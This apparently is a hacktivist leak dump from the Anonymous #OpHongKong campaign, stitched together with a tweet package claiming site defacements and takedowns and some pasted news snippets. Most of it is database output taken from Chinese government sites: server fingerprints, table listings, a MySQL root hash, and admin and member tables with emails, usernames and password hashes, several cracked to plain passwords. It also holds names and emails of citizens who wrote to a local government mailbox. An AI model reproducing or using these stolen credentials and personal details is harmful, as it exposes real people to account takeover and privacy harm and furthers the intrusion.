| b10d55b58ce45fb1                      | zhangbaolan                                         | 0           |
| 49ba59abbe56e057                      | abcd123                                             | 0           |
| 18a5c9ed29ce7b35                      | hjcompany                                           | 0           |
| 1bebb5c40e7e3de1                      | lwz0727                                             | 0           |
| 761dd11678ebc9d4                      | Č\xfdş\xcd\xceď\xc1\xf7                             | 0           |
| 5f3cac7d3d026050                      | liuhui                                              | 0           |
| eb5bf50c7a06264d                      | ĘŽşĹĎČ\xc9\xfa                                      | 0           |
| 3b5ed83afda348fd                      | zenghuiyou                                          | 0           |
| b34f164d779c992f                      | goldtody                                            | 0           |
| 809307b5e1350d87                      | 22179                                               | 0           |
| 589092e4986727ef                      | conniezhou                                          | 0           |
| 589092e4986727ef                      | şă\xb0ŽŐŐĂ\xf7                                      | 0           |
| 53be859fc3ae1d88                      | \xb0ŮŇŔšń\xd7ĺ                                      | 0           |
| 761dd11678ebc9d4                      | šˇšˇŃľ\xc1ˇŃ\xa7\xd4ş                               | 0           |
| 5abb28d75b4ec606                      | RexGCS                                              | 0           |
| 761dd11678ebc9d4                      | ť\xa8śźŇ˝\xc1ĆĆ\xf7Đľ\xc9čą\xb8Ĺ\xfaˇ˘              | 0           |
| 0c397f1532068e2c                      | Ę\xa8\xc1\xebĐŹł\xc7                                | 0           |
| ec4b64934e28fbe9                      | jch899                                              | 0           |
| bdeadd16dae2534c                      | petpetcong                                          | 0           |
| 63f0c3494f3281cf                      | eingxi                                              | 0           |
| 7bbb14ae5be23073                      | lyg_1225                                            | 0           |
| 77804d2ba1922c33                      | zengquanzheng                                       | 2           |
| 77804d2ba1922c33                      | \xc2ňźŇŐ\xcbşĹ                                      | 0           |
| 44001a43a2dd56a6                      | wansouhr                                            | 0           |
| b10d55b58ce45fb1                      | zhangbl                                             | 0           |
| 44f11f0992ee825d                      | quxi                                                | 0           |
| 49ba59abbe56e057                      | \xd3Ĺş\xfcơĹƲ\xdfťŽ                               | 0           |
| beccd02b5423de12                      | huangyao                                            | 0           |
| 8aa2a682f417489d                      | lx                                                  | 0           |
 ################################  8000+ more of these entries #########################################
yintai.gov.cn
web server operating system: FreeBSD
web application technology: PHP 5.4.23, Apache 2.2.26
back-end DBMS: MySQL 5.0
available databases [5]:
[*] information_schema
[*] phpmyadmin
[*] ytbbs
[*] ytblog
[*] ytweb
Database: ytweb
[71 tables]
+------------------------+
| phpcms_Site_Count      |
| phpcms_admin           |
| phpcms_apply           |
| phpcms_article_1       |
| phpcms_article_29      |
| phpcms_article_30      |
| phpcms_article_31      |
| phpcms_article_32      |
| phpcms_article_33      |
| phpcms_article_34      |
| phpcms_article_35      |
| phpcms_article_36      |
| phpcms_article_37      |
| phpcms_article_38      |
| phpcms_article_39      |
| phpcms_article_40      |
| phpcms_article_41      |
| phpcms_article_42      |
| phpcms_article_43      |
| phpcms_article_44      |
| phpcms_article_data_1  |
| phpcms_article_data_29 |
| phpcms_article_data_30 |
| phpcms_article_data_31 |
| phpcms_article_data_32 |
| phpcms_article_data_33 |
| phpcms_article_data_34 |
| phpcms_article_data_35 |
| phpcms_article_data_36 |
| phpcms_article_data_37 |
| phpcms_article_data_38 |
| phpcms_article_data_39 |
| phpcms_article_data_40 |
| phpcms_article_data_41 |
| phpcms_article_data_42 |
| phpcms_article_data_43 |
| phpcms_article_data_44 |
| phpcms_attachment      |
| phpcms_author          |
| phpcms_banip           |
| phpcms_category        |
| phpcms_channel         |
| phpcms_city            |
| phpcms_copyfrom        |
| phpcms_field           |
| phpcms_guestbook       |
| phpcms_keylink         |
| phpcms_keywords        |
| phpcms_link            |
| phpcms_log             |
| phpcms_mailbook        |
| phpcms_member          |
| phpcms_member_group    |
| phpcms_member_info     |
| phpcms_menu            |
| phpcms_module          |
| phpcms_mytag           |
| phpcms_myzj            |
| phpcms_position        |
| phpcms_province        |
| phpcms_reword          |
| phpcms_sessions        |
| phpcms_special         |
| phpcms_sqgk            |
| phpcms_sqgk_department |
| phpcms_sqgk_reply      |
| phpcms_type            |
| phpcms_vote_data       |
| phpcms_vote_option     |
| phpcms_vote_subject    |
| phpcms_zjqzf           |
+------------------------+
Database: ytweb
Table: phpcms_admin
[9 columns]
+------------+---------------------+
| Column     | Type                |
+------------+---------------------+
| catids     | text                |
| channelids | text                |
| disabled   | tinyint(1) unsigned |
| grade      | tinyint(2) unsigned |
| modules    | text                |
| purviewids | text                |
| specialids | text                |
| userid     | int(11) unsigned    |
| username   | varchar(30)         |
+------------+---------------------+
Database: ytweb
Table: phpcms_member
[26 columns]
+---------------+----------------------+
| Column        | Type                 |
+---------------+----------------------+
| domain        | varchar(50)          |
| answer        | varchar(32)          |
| arrgroupid    | varchar(100)         |
| authstr       | varchar(32)          |
| begindate     | date                 |
| chargetype    | tinyint(1)           |
| credit        | smallint(5) unsigned |
| email         | varchar(50)          |
| enddate       | date                 |
| groupid       | smallint(5) unsigned |
| hits          | int(11) unsigned     |
| items         | smallint(5) unsigned |
| lastloginip   | varchar(15)          |
| lastlogintime | int(11) unsigned     |
| logintimes    | smallint(5) unsigned |
| money         | float                |
| newmessages   | tinyint(3) unsigned  |
| password      | varchar(32)          |
| payment       | float unsigned       |
| point         | smallint(5) unsigned |
| question      | varchar(50)          |
| regip         | varchar(15)          |
| regtime       | int(11) unsigned     |
| showemail     | tinyint(1)           |
| userid        | int(11) unsigned     |
| username      | varchar(20)          |
+---------------+----------------------+
Database: ytweb
Table: phpcms_member
[67 entries]
+-------------------------+-----------+---------------------------------------------+
| email                   | username  | password                                    |
+-------------------------+-----------+---------------------------------------------+
| yintai@yintai.gov.cn    | yintai    | d069f7dcaeb54d8ed6714ff8735727b5            |
| hydrabit@hushmail.com   | 区统计局      | e10adc3949ba59abbe56e057f20f883e (123456)   |
| qfgj@163.com            | 区发改局      | e10adc3949ba59abbe56e057f20f883e (123456)   |
| qszb@gov.cn             | 区史志办      | fd233d865fd35a80a67fb9a9c568faa5            |
| zfb@yintai.gov.cn       | 区政府办      | a191a8f3514391b6632f5d81ae44c7bb            |
| 283913169@qq.com        | zhanglei  | cbbbdd851c60627b4785e3ecedc8ff3e (zhanglei) |
| qzjj@163.com            | 区住建局      | b3caefc7691c6c33473b1f55801cade5            |
| qwgj@163.con            | 区文广局      | e10adc3949ba59abbe56e057f20f883e (123456)   |
| qzqj@163.com            | 区中企局      | d4abd499508a61e3a9d27c3dc4bb23a7            |
| qjgswj@163.com          | 区机关事务局    | 656dfad3327b181f88c38eb4bc630930            |
| yingjiban@yintai.gov.cn | 区应急办      | 2edf872f61afa7638945c2445edd425d            |
| jishengju@yintai.gov.cn | 区计生局      | 82a24d27096f6aafcc08798f64df24df            |
| qrsj@163.com            | 区人社局      | e10adc3949ba59abbe56e057f20f883e (123456)   |
| qczj@yintai.gov.cn      | 区财政局      | e10adc3949ba59abbe56e057f20f883e (123456)   |
| qjcj@yintai.gov.cn      | 区监察局      | e10adc3949ba59abbe56e057f20f883e (123456)   |
| qmzj@yintai.gov.cn      | 区民政局      | e10adc3949ba59abbe56e057f20f883e (123456)   |
| qsjj@yintai.gov.cn      | 区审计局      | 77ff5586f378b4da297430d81ee432d8            |
| qkjj@yintai.gov.cn      | 区科技局      | 9ce3afb09a04884bbd894a6479b22694            |
| clgwh@163.com           | 陈炉管委会     | a43b3b2766a8a8f5e0344f5474f1d307            |
| yintainongye@126.com    | 区农业局      | 0b27cac2dcd5f378f0cc4d653e8ee19f            |
| qslj@yintai.gov.cn      | 区水务局      | e10adc3949ba59abbe56e057f20f883e (123456)   |
| qzsj@yintai.gov.cn      | 区招商局      | e10adc3949ba59abbe56e057f20f883e (123456)   |
| ytjyjdb@126.com         | 区教育局      | d3d38c4cdb01084bd8c9fc26390f6001            |
| qwsj@yintai.gov.cn      | 区卫生局      | d54f804e952f7462fda0ad9ac2a9a6a1            |
| qsfj@yintai.gov.cn      | 区司法局      | e10adc3949ba59abbe56e057f20f883e (123456)   |
| qswj@163.com            | 区商务局      | ae261832801cfd02f9ec06eb39d81ce1            |
| qxfj@yintai.gov.cn      | 区信访局      | 3c7840d8730d425e281ef8809913fa2c            |
| qghfj@163.com           | 区规划分局     | 57b6791c66b57e404b1eec9b97a1b35c            |
| qwlj@yintai.gov.cn      | 区文旅局      | e10adc3949ba59abbe56e057f20f883e (123456)   |
| qajj@yintai.gov.cn      | 区安监局      | 38f27d92bb9e889945cdd28efa8bd09a            |
| qwjj@yintai.gov.cn      | 区物价局      | 2d18efe0b4e8c6f7e276766c03e60bdf            |
| ythb888@163.com         | 区环保局      | 5514e0552d755925bf2320266ee98319            |
| qxmb@yintai.gov.cn      | 区项目办      | ef1dd76326d97e30d6f0f49f86b6f91f            |
| qngb@yintai.gov.cn      | 区农工部      | e1740beb59308249b5f27dbd57d554eb            |
| qgsj@yintai.gov.cn      | 区国税局      | d44d992056cab08620420d51bc852091            |
| gsfj@yintai.gov.cn      | 工商分局      | e10adc3949ba59abbe56e057f20f883e (123456)   |
| dsfj@yintai.gov.cn      | 地税分局      | 1d2018537f9416f59598eb354c99602d            |
| zjfj@yintai.gov.cn      | 质监分局      | e10adc3949ba59abbe56e057f20f883e (123456)   |
| gafj@yintai.gov.cn      | 公安分局      | e10adc3949ba59abbe56e057f20f883e (123456)   |
| cgjdb@yintai.gov.cn     | 城关街道办     | 111f6d4335b4085784553138b908cfb2            |
| sldjdbsc@yintai.gov.cn  | 三里洞街道办    | 3a5ec0dcf3118b1143d7c9890da41354            |
| clz@yintai.gov.cn       | 陈炉镇       | e10adc3949ba59abbe56e057f20f883e (123456)   |
| htz@yintai.gov.cn       | 红土镇       | e10adc3949ba59abbe56e057f20f883e (123456)   |
| rc1985@163.com          | 广阳镇       | f7b7a7365c6c8ba71dcb27bec11e534d            |
| yhz@yintai.gov.cn       | 玉华镇       | 497a9ce2c9e1430898e373e0c3e127f9            |
| jsgz@yintai.gov.cn      | 金锁关镇      | e10adc3949ba59abbe56e057f20f883e (123456)   |
| wsaz@yintai.gov.cn      | 王石凹镇      | 221a341a0781382a99c82033a86d16cd (131415)   |
| azz@163.com             | 阿庄镇       | be021bf904406ee858fa8ee05356f9db            |
| ytx@yintai.gov.cn       | 印台乡       | e10adc3949ba59abbe56e057f20f883e (123456)   |
| glhx@yintai.gov.cn      | 高楼河乡      | e10adc3949ba59abbe56e057f20f883e (123456)   |
| qlyj@yintai.gov.cn      | 区林业局      | e10adc3949ba59abbe56e057f20f883e (123456)   |
| qlsj@yintai.gov.cn      | 区粮食局      | e10adc3949ba59abbe56e057f20f883e (123456)   |
| qgyj@yintai.gov.cn      | 区果业局      | e10adc3949ba59abbe56e057f20f883e (123456)   |
| qmtj@yintai.gov.cn      | 区煤炭局      | ab7bb380a6fd732a90635702b6d90a8a            |
| qyjj@163.com            | 区药监局      | e10adc3949ba59abbe56e057f20f883e (123456)   |
| qfpb@yintai.gov.cn      | 区扶贫办      | e10adc3949ba59abbe56e057f20f883e (123456)   |
| gtzyfj@yintai.gov.cn    | 国土资源分局    | 3456e9e0c6539d6364952d44917bb5ad            |
| zlgwh@yintai.gov.cn     | 周陵管委会     | e10adc3949ba59abbe56e057f20f883e (123456)   |
| qscb@163.com            | 区三创办      | 585183b78d7be1bca1d5605d7605dd9c            |
| ytsjgyyq@163.com        | 顺金管委会     | e10adc3949ba59abbe56e057f20f883e (123456)   |
| qgxj@163.com            | 区工信局      | e10adc3949ba59abbe56e057f20f883e (123456)   |
| qjtysj@163.com          | 区交通运输局    | e10adc3949ba59abbe56e057f20f883e (123456)   |
| long@xasn.com           | sunyuqing | 0bc651ef7626a7868da4cbfdbe70f96f (longlong) |
| mfy@yintai.gov.cn       | mfy       | e10adc3949ba59abbe56e057f20f883e (123456)   |
| xiaohui@163.com         | xiaohui   | 3c1a6196ffe9bd7d0dc3b226a834b72b            |
| 726659093@qq.com        | 电子政务管理中心  | 082338d51d8923afff32da9a840f2cc4            |
| tctiger@163.com         | tiger     | 1311612e8976a12435c707b469dcfac7            |
+-------------------------+-----------+---------------------------------------------+
Database: ytweb
Table: phpcms_admin
[66 entries]
+----------+
| username |
+----------+
| mfy      |
| tiger    |
| xiaohui  |
| yintai   |
| zhanglei |
| 三里洞街道办   |
| 公安分局     |
| 区三创办     |
| 区中企局     |
| 区交通运输局   |
| 区人社局     |
| 区住建局     |
| 区信访局     |
| 区农业局     |
| 区农工部     |
| 区卫生局     |
| 区发改局     |
| 区史志办     |
| 区司法局     |
| 区商务局     |
| 区国税局     |
| 区安监局     |
| 区审计局     |
| 区工信局     |
| 区应急办     |
| 区扶贫办     |
| 区招商局     |
| 区政府办     |
| 区教育局     |
| 区文广局     |
| 区文旅局     |
| 区机关事务局   |
| 区林业局     |
| 区果业局     |
| 区民政局     |
| 区水务局     |
| 区煤炭局     |
| 区物价局     |
| 区环保局     |
| 区监察局     |
| 区科技局     |
| 区粮食局     |
| 区统计局     |
| 区药监局     |
| 区规划分局    |
| 区计生局     |
| 区财政局     |
| 区项目办     |
| 印台乡      |
| 周陵管委会    |
| 国土资源分局   |
| 地税分局     |
| 城关街道办    |
| 工商分局     |
| 广阳镇      |
| 玉华镇      |
| 王石凹镇     |
| 电子政务管理中心 |
| 红土镇      |
| 质监分局     |
| 金锁关镇     |
| 阿庄镇      |
| 陈炉管委会    |
| 陈炉镇      |
| 顺金管委会    |
| 高楼河乡     |
+----------+
Database: ytweb
Table: phpcms_mailbook
[66 entries]
+-----------------------+----------+
| mail                  | username |
+-----------------------+----------+
| <blank>               | 田昆       |
| www.710734787@163.com | 杨先生      |
| <blank>               | 荣华一业主    |
| 228602600@QQ.com      | 王瑞       |
| <blank>               | 李丽       |
| wblwaqcpu@163.com     | 王阿强      |
| <blank>               | 王红       |
| qibinai009@163.com    | 戚彬       |
| <blank>               | 贾红武      |
| <blank>               | 任雅       |
| <blank>               | 张伟       |
| <blank>               | 邵雪峰      |
| <blank>               | 宗世香      |
| <blank>               | 肖永强      |
| zhanghan747@sina.cn   | 长虹       |
| <blank>               | 风行       |
| <blank>               | 王宏娟      |
| 398219436@qq.com      | 原伟       |
| <blank>               | 乔宝成      |
| <blank>               | 崔俊娥      |
| <blank>               | 田家栓      |
| <blank>               | 王林       |
| <blank>               | 冉树继      |
| 404474729@qq.com      | 王芳丽      |
| <blank>               | 郭才兴      |
| <blank>               | 郭才兴      |
| kdh.123456@163.com    | 孔东海      |
| <blank>               | 任战平      |
| <blank>               | 李世坤      |
| 445409268@qq.com      | 印台区居民    |
| <blank>               | 肖盼       |
| <blank>               | 秘密       |
| <blank>               | 王婷       |
| <blank>               | 侯晓东      |
| <blank>               | 都市快报     |
| <blank>               | 刘畅       |
| 1071719373@qq.com     | 高秋香      |
| <blank>               | 小李       |
| <blank>               | 王红侠      |
| <blank>               | 李女士      |
| 280019454@qq.com      |  王涛      |
| <blank>               | 袁洁       |
| <blank>               | 刘旭波      |
| <blank>               | 李满仓      |
| <blank>               | 刘风       |
| <blank>               | 匿名       |
| <blank>               | 杨明       |
| <blank>               | 马家河村民    |
| <blank>               | 路二龙      |
| <blank>               | 罗贵峰      |
| <blank>               | 农民       |
| tcxxjy@126.com        | 刘胜岭      |
| <blank>               | 林宁       |
| <blank>               | 李大为      |
| 273775632@qq.com      | 徐梅       |
| <blank>               | 农民       |
| 546805790@qq.com      | 郭成功      |
| 549712719@qq.com      | 席月丽      |
| <blank>               | 李        |
| 302555865@qq.com      | 刘飞       |
| <blank>               | 卫明明      |
| <blank>               | 印台公民     |
| <blank>               | 黄金宝      |
| <blank>               | 白君海      |
| <blank>               | 王娟       |
| <blank>               | 高晓斌      |
+-----------------------+----------+

 

 ==========


#OpHongKong TwitterPackage

 Twitterstorm for #OpHongKong 

---Add #OpHongKong to all tweets
some premade tweets, feel free to make your own, and remember: RT's don't help!  copy/paste tweets
#Anonymous stands in solidarity with the citizens of #HongKong Expect Us #OpHongKong
Central Government of #China, allow #HongKong to have democratic elections without pre-selection of committe #OpHongKong
#OpHongKong twitterstorm! Remember RT's DO NOT help copy/paste
Help #HongKong get the democracy it deserves! #OpHongKong
We will not stand down, help our friends in #HongKong #OpHongKong
Triads and others who against the occupy central have attacked the protests, help them now #OpHongKong
We demand that the government allow the citizens to choose the candidates #OpHongKong
Police have used tear gas and rubber bullets on innocent people. Do you think this is acceptable? #OpHongKong
CY Leung, step down. The People of Hong Kong want a democratic election without pre-selection of committe #OpHongKong
Hong Kong citizens are rasing both of their hands peacefully against police's violent suppression. Support our dear friends in Hong Kong! #OpHongKong
http://www.youtube.com/watch?v=MtSXxEUiEo0&feature=youtube_gdata Hong Kong, we fight for and with you. The world stands beside you. #OpHongKong
The citizens of Hong Kong are not alone. We Are #Anonymous. We Do Not Forgive, We Do Not Forget. Expect Us. #OpHongKong #anonops
Citizens of #HongKong, we stand by your peaceful efforts. We are #Anonymous. We do not forgive, We do not forget. Governments of China and Hong Kong, expect us. #OpHongKong
The people of Hong Kong need your support now. Do not stand by and watch the fight for democracy from the sideline. TAKE ACTION. END CORRUPTION #OpHongKong
Injured peaceful protesters?  This is not acceptable.  ACT NOW and support the people of Hong Kong  #OpHongKong
What would you do If this was your country? Support #OpHongKong
Do you believe what we believe? feel the way we feel? Help Hong Kong people to end corruption. Support #OpHongKong #anonops
Meet Joshua Kong, leader of the Hong Kong Protest.  https://www.youtube.com/watch?v=g2VuWLGUub0 #OpHongKong
Knocking down another wall :) -> https://pbs.twimg.com/media/BzYBUGZCYAAMU4F.jpg #OpHongKong
If they rain on your parade, bring an umbrella. In solidarity with the people of Hong Kong https://pbs.twimg.com/media/BzeRUlPIYAA1PsG.jpg #OpHongKong
#OpHongKong http://imgur.com/wYfDIFA stats.gov.cn #TangoDown
Respect to the brave students #UmbrellaRevolution #OpHongKong #OccupyCentral
#OpHongKong http://imgur.com/wYfDIFA saic.gov.cn #TangoDown
#OpHongKong http://imgur.com/RbXkG3U sanya.gov.cn #TangoDown
#OpHongKong 7 websites the Chinese government is under the control of Anonymous. You should have expected us. http://pastebin.com/0Ce4je8r  
#OpHongKong http://imgur.com/4haq9Ox saic.gov.cn #TangoDown
#OpHongKong http://imgur.com/eCppp9U police.gov.hk #TangoDown
Do Not host or support HongKong/Chinese Gov. #TangoDown #OpHongKong http://imgur.com/CsoSTuT
http://gyx.gov.cn #Hacked #OpHongKong http://pastebin.
qxj.km.gov.cn/hector.html #Hacked #Defaced #OpHongKong
tielingws.gov.cn/ #Hacked #Defaced #OpHongKong  #China, We Told You To Expect Us
#Solidarity For those arrested You are not forgotten. #resistance #OpHongKong
#OpHongKong We will stand with the people of China, Keep Fighting
We will shutdown China and reboot #OpHongKong
#China Government We Stand in Solidarity with the citizens of #HongKong So we killed your Military server http://chinamil.com.cn #OpHongKong
How Bout some justice for #HongKong Ministry of Justicehttp://moj.gov.cn #TangoDown #OpHongKong
First strength was measured in muscle, then brains, then missiles, now technology
We have made #China look weak #OpHongKong
http://tanbu.gov.cn  #Hacked #OpHongKong

tanbu.gov.cn Hacked


https://twitter.com/OpHongKong
webchat.anonops.com channel : #OpHongKong
##################################################################################################
Site Breached:  http://www.tanbu.gov.cn
 D:\tanbu_gov_cn\
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET, PHP 5.2.13, Microsoft IIS 7.0
back-end DBMS: MySQL 5.0
database management system users [2]:
[*] 'root'@'%'
[*] 'root'@'localhost'
database management system users password hashes:
[*] root [1]:
    password hash: *056C8E28E452A0A98F43B9D896B281078E56630F
available databases [5]:
[*] information_schema
[*] mysql
[*] supertanbu
[*] test
[*] yitie
Database: mysql
[24 tables]
+---------------------------+
| user                      |
| columns_priv              |
| db                        |
| event                     |
| foo                       |
| func                      |
| general_log               |
| help_category             |
| help_keyword              |
| help_relation             |
| help_topic                |
| host                      |
| ndb_binlog_index          |
| plugin                    |
| proc                      |
| procs_priv                |
| servers                   |
| slow_log                  |
| tables_priv               |
| time_zone                 |
| time_zone_leap_second     |
| time_zone_name            |
| time_zone_transition      |
| time_zone_transition_type |
+---------------------------+
Database: mysql
Table: user
[2 entries]
+--------+-------------------------------------------+
| User   | Password                                  |
+--------+-------------------------------------------+
| root   | *056C8E28E452A0A98F43B9D896B281078E56630F |
| root   | *056C8E28E452A0A98F43B9D896B281078E56630F |
+--------+-------------------------------------------+
Database: supertanbu
[27 tables]
+-------------------+
| area              |
| base_info         |
| channel_functions |
| channel_publish   |
| channels          |
| deliver_add       |
| enterprise        |
| group_user        |
| language_version  |
| mall_aboutus      |
| mall_contactus    |
| messages          |
| messages_         |
| mobile_code       |
| my_codes          |
| news_email        |
| news_publish      |
| pic               |
| product_publish   |
| product_sort      |
| temp_emails       |
| tuan_orders       |
| tuan_orders_num   |
| tuan_products     |
| users             |
| videos            |
| vote              |
+-------------------+
Table: users
[5 entries]
+-------+-----------------+----------------------------------+
| Power | UserName        | Password                         |
+-------+-----------------+----------------------------------+
| 1     | simonshawn      | 637094986520c347542f2f5aec0981fc |
| 3     | Őţ\xceńżĆ       | 96e79218965eb72c92a549dd5a330112 |
| 3     | \xcdś\xd7ĘżĆ    | 96e79218965eb72c92a549dd5a330112 |
| 3     | \xc2Ă\xd3\xceżĆ | 96e79218965eb72c92a549dd5a330112 |
| 1     | xia             | 96e79218965eb72c92a549dd5a330112 |
+-------+-----------------+----------------------------------+
Database: yitie
[72 tables]
+--------------------+
| returns            |
| area               |
| base_info          |
| channel_functions  |
| channel_publish    |
| channels           |
| comments           |
| deliverlist        |
| get_focus          |
| hy_ad              |
| hy_admin           |
| hy_category        |
| hy_city            |
| hy_comabout        |
| hy_comad           |
| hy_comcategory     |
| hy_comcomments     |
| hy_comcoupons      |
| hy_comments        |
| hy_commessage      |
| hy_commontel       |
| hy_commonweb       |
| hy_comnews         |
| hy_comonline       |
| hy_comphotos       |
| hy_comproduct      |
| hy_comtemplate     |
| hy_consume         |
| hy_consume_import  |
| hy_favorites       |
| hy_help            |
| hy_helpcategory    |
| hy_industry        |
| hy_info            |
| hy_inforeport      |
| hy_ipdata          |
| hy_ipdatanew       |
| hy_label           |
| hy_labelcategory   |
| hy_link            |
| hy_message         |
| hy_news            |
| hy_newscategory    |
| hy_options         |
| hy_picupdateinfo   |
| hy_productcategory |
| hy_productorder    |
| hy_recharge        |
| hy_search          |
| hy_setup           |
| hy_template        |
| hy_templatedata    |
| hy_upfile          |
| hy_user            |
| hy_user_import     |
| hy_userface        |
| hy_webcategory     |
| language_version   |
| navdisplay         |
| navdisplay1        |
| news_publish       |
| pbcatcol           |
| pbcatedt           |
| pbcatfmt           |
| pbcattbl           |
| pbcatvld           |
| porders            |
| product_color      |
| product_pic        |
| product_size       |
| returnpic          |
| shai               |
+--------------------+
Table: hy_admin
[11 entries]
+----------------+------------------+------------------+
| A_LoginIP      | A_UserPass       | A_UserName       |
+----------------+------------------+------------------+
| 36.250.225.47  | 6520c347542f2f5a | admin            |
| 120.197.64.11  | 8a63938a1f1895c3 | xinwen           |
| NULL           | 028943d587f463cd | xxbj             |
| 58.67.137.193  | 028943d587f463cd | xinxish          |
| 112.91.70.213  | 965eb72c92a549dd | anhuichaohu      |
| 58.67.137.193  | 965eb72c92a549dd | guangzhouconghua |
| 120.197.64.11  | 00c67b55ed083b2b | 10000            |
| 58.253.216.194 | 0d9518c13ed26169 | 10001            |
| NULL           | 21684142219402f2 | sai              |
| 120.197.64.11  | 83f150c81d28979e | yangmj           |
| NULL           | f8b08a4f865a9970 | simon.shawn      |
+----------------+------------------+------------------+
Database: yitie
Table: hy_user
[5358 entries]
+---------------------------------------+-----------------------------------------------------+-------------+
| U_UserPass                            | U_UserName                                          | U_AuthEmail |
+---------------------------------------+-----------------------------------------------------+-------------+
| Ďľ\xcdłąŁ\xc1\xf4\xceޡ\xa8ľ\xc7\xc2ź | \xd3\xceż\xcd                                       | 0           |
| ac0541311f84ec36                      | 888888                                              | 0           |
| 0c397f1532068e2c                      | 371567139                                           | 2           |
| 93471ec5749c359f                      | felinal                                             | 0           |
| cc943a57615a1266                      | lyg1225                                             | 0           |
| 0d8d0b60a8c4e9dd                      | ş\xcdŇť\xc9Ěąę\xd7\xa8Ŕű\xb4\xfaŔ\xed               | 0           |
| c548ede5973a63fd                      | \xb0\xd7ĚěśđĂŔČ\xddŃř\xc9\xfaš\xdd                  | 0           |
| bf6b3b3ec144088b                      | leonardren                                          | 0           |
| 1dbf6af85f31021d                      | wenaswenzi                                          | 0           |
| ac59075b964b0715                      | \xcd\xa8ĐĹ\xd6ŽźŇ                                   | 2           |
| fa69df218cbccdb1                      | ˇ˘Ď\xd6Ŕńơ                                         | 0           |
| 77804d2ba1922c33                      | \xd4řČ\xa8Ő\xf7                                     | 0           |
| 14a5094b41f7212a                      | šă\xce\xf7\xd3ń\xc1\xd6                             | 0           |
| 8a5cbff90cf09474                      | yicheng2011                                         | 0           |
| c9dbc224e53d38af                      | lgzyzxc0906                                         | 0           |
| b10d55b58ce45fb1                      | zhangbaolan                                         | 0           |
| 49ba59abbe56e057                      | abcd123                                             | 0           |
| 18a5c9ed29ce7b35                      | hjcompany                                           | 0           |
| 1bebb5c40e7e3de1                      | lwz0727                                             | 0           |
| 761dd11678ebc9d4                      | Č\xfdş\xcd\xceď\xc1\xf7                             | 0           |
| 5f3cac7d3d026050                      | liuhui                                              | 0           |
| eb5bf50c7a06264d                      | ĘŽşĹĎČ\xc9\xfa                                      | 0           |
| 3b5ed83afda348fd                      | zenghuiyou                                          | 0           |
| b34f164d779c992f                      | goldtody                                            | 0           |
| 809307b5e1350d87                      | 22179                                               | 0           |
| 589092e4986727ef                      | conniezhou                                          | 0           |
| 589092e4986727ef                      | şă\xb0ŽŐŐĂ\xf7                                      | 0           |
| 53be859fc3ae1d88                      | \xb0ŮŇŔšń\xd7ĺ                                      | 0           |
| 761dd11678ebc9d4                      | šˇšˇŃľ\xc1ˇŃ\xa7\xd4ş                               | 0           |
| 5abb28d75b4ec606                      | RexGCS                                              | 0           |
| 761dd11678ebc9d4                      | ť\xa8śźŇ˝\xc1ĆĆ\xf7Đľ\xc9čą\xb8Ĺ\xfaˇ˘              | 0           |
| 0c397f1532068e2c                      | Ę\xa8\xc1\xebĐŹł\xc7                                | 0           |
| ec4b64934e28fbe9                      | jch899                                              | 0           |
| bdeadd16dae2534c                      | petpetcong                                          | 0           |
| 63f0c3494f3281cf                      | eingxi                                              | 0           |
| 7bbb14ae5be23073                      | lyg_1225                                            | 0           |
| 77804d2ba1922c33                      | zengquanzheng                                       | 2           |
| 77804d2ba1922c33                      | \xc2ňźŇŐ\xcbşĹ                                      | 0           |
| 44001a43a2dd56a6                      | wansouhr                                            | 0           |
| b10d55b58ce45fb1                      | zhangbl                                             | 0           |
| 44f11f0992ee825d                      | quxi                                                | 0           |
| 49ba59abbe56e057                      | \xd3Ĺş\xfcơĹƲ\xdfťŽ                               | 0           |
| beccd02b5423de12                      | huangyao                                            | 0           |
| 8aa2a682f417489d                      | lx                                                  | 0           |

 ################################  8000+ more of these entries #########################################




=====

 *[06/11-2015]Update- By Anonymous Action=更新匿名行動 [ #opchina #ophk ]]- The Anonymous Legion said :"#OpHongKong 7 websites the Chinese government is under the control of Anonymous. You should have expected us. "-
"[http://XXXXX.com ]-& By{ news2.mingpao.com }-Well done^^!Melody.Blog Thankgiving for all great" Support Human Right Org."~

 http://melody-free-shaing.blogspot.com/2015/11/4-11-2015-update-1-in-november-it-is.html
 ===Melody.Blog===Thanksgiving~
 ===######################################################

 ===############################################################
 http://www.ntdtv.com/xtr/gb/2015/11/02/a1233237.html

 http://www.ntdtv.com/xtr/gb/2015/11/02/articledownload1233237.html&usg=ALkJrhhhVRdITnI-AfG0kmE3nfWgVhC7iw




=====
 http://www.ntdtv.com/xtr/gb/2015/11/02/a1233237.html
意外〝推倒〞柏林牆歷史功臣沙博夫斯基逝世
 http://www.ntdtv.com/xtr/gb/2015/11/02/articledownload1233237.html&usg=ALkJrhhhVRdITnI-AfG0kmE3nfWgVhC7iw
 
 

 =====


 Anonymous Asia - 匿名亞洲
Bermacam Hal yang Perlu Diketahui soal Edaran Kapolri tentang "Hate Speech"... - Kompas.com Nasional - http://nasional.kompas.com/…/Bermacam.Hal.yang.Perlu.Diketa…
‪#‎Indonesia‬'s police set new order to reject the ‪#‎BDS‬ movement apparently disguised as the fight against "hate speech".


Bermacam Hal yang Perlu Diketahui soal Edaran Kapolri tentang "Hate Speech"...

Jumat, 30 Oktober 2015.
 Fabian Januarius Kuwado/KOMPAS.com  ,, Kepala Polri Jenderal Badrodin Haiti.

JAKARTA, KOMPAS.com – Setelah dikaji cukup lama, Surat Edaran (SE) Kapolri soal penanganan ujaran kebencian atau hate speech akhirnya dikeluarkan.
SE dengan Nomor SE/06/X/2015 tersebut diteken Jenderal Badrodin Haiti pada 8 Oktober 2015 lalu dan telah dikirim ke Kepala Satuan Wilayah (Kasatwil) seluruh Indonesia.
Dalam salinan SE yang diterima Kompas.com dari Divisi Pembinaan dan Hukum (Divbinkum) Polri, Kamis (29/10/2015), disebutkan bahwa persoalan ujaran kebencian semakin mendapatkan perhatian masyarakat baik nasional atau internasional seiring meningkatnya kepedulian terhadap perlindungan hak asasi manusia (HAM).
Bentuk, Aspek dan Media
Pada Nomor 2 huruf (f) SE itu, disebutkan bahwa “ujaran kebencian dapat berupa tindak pidana yang diatur dalam Kitab Undang-Undang Hukum Pidana (KUHP) dan ketentuan pidana lainnya di luar KUHP, yang berbentuk antara lain:
1. Penghinaan,
2. Pencemaran nama baik,
3. Penistaan,
4. Perbuatan tidak menyenangkan,
5. Memprovokasi,
6. Menghasut,
7. Menyebarkan berita bohong dan semua tindakan di atas memiliki tujuan atau bisa berdampak pada tindak diskriminasi, kekerasan, penghilangan nyawa, dan atau konflik sosial”.
